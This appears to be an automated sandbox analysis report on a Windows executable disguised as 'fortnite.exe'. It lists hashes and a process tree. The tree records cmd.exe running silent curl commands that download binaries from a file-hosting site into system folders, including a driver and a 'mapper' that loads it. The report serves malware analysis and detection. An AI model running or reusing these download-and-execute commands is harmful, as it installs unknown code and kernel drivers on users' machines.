Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
-
submitted
17-11-2024 18:51
General
-
Target
fortnite.exe
-
Size
1.2MB
-
MD5
4ce2034a29fa1119013b35414ac146c8
-
SHA1
1bc3b7ff47f254f3058f8030e7081d48e762b1fc
-
SHA256
01d4438ab4eb34157102cef468aeafe178500b30a557efb0a14bcf117e7eeb8f
-
SHA512
9ff48316eff7b1cf2317ce9c363b596a42100c0f2ff3c17f06c3efe8f3f4b8de93072f594c4dfc7f7cdbf9b4c768643448141ca78bab4db28122f88d3ad64e27
-
SSDEEP
24576:zMbpm9Z/zQfnkuGKF7rlpC+bKlAtc06Du:PrQnIGz
Score
1/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite.exe"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/5yimk7.sys --output C:\Windows\System32\Tasks\driver.sys >nul 2>&12⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/wvsaqx.bin --output C:\Windows\System32\Tasks\mapper.exe >nul 2>&12⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\Tasks\mapper.exe C:\Windows\System32\Tasks\driver.sys2⤵
-